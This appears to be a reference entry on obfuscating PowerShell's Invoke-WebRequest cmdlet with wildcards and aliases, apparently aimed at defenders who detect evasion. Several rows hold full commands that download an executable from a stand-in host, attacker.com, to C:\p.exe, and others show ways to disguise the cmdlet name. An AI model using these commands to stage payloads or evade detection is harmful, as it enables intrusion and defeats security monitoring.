Invoke-WebRequest
Download files or interact with web services. PowerShell's built-in HTTP client, commonly used for payload staging.
Binary Paths
PowerShell cmdlet (System.Net.WebClient wrapper)
Glob Patterns
| Pattern | Wildcards | Notes |
|---|---|---|
& (gcm I*oke-W*R*) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
* | Get-Command (gcm) resolves cmdlet by wildcard. I*oke matches Invoke, W*R* matches WebRequest |
& (gcm Inv?ke-WebRequest) -Uri ...
|
? | Single char wildcard replaces 'o' |
& (gcm I*-W*t) -Uri ...
|
* | Abbreviated wildcards, still resolves to Invoke-WebRequest |
iwr -Uri ...
|
Built-in alias 'iwr' — not a glob but commonly used obfuscation | |
curl -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Alias 'curl' for Invoke-WebRequest (Windows PowerShell 5.1 only; removed in PS Core 6+) | |
wget -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Alias 'wget' for Invoke-WebRequest (Windows PowerShell 5.1 only; removed in PS Core 6+) | |
& (Get-Command *Web*quest) -Uri ...
|
* | Full Get-Command with wildcards around 'Web' |
& (gcm *-WebR*) -Uri ...
|
* | Wildcard before verb and in noun |
& (gcm Invok[d-f]-WebRequest) -Uri ...
|
[d-f] | Character range matches 'e' in Invoke |
& (gal i?r) -Uri ...
|
? | Get-Alias with wildcard resolves 'iwr' |
Platform Notes
PowerShell cmdlet name resolution supports wildcards via Get-Command. The pattern & (gcm Wildcard*Pattern) -Args is idiomatic “globfuscation”. The & operator invokes the resolved cmdlet. Aliases like iwr, curl, wget also resolve to Invoke-WebRequest.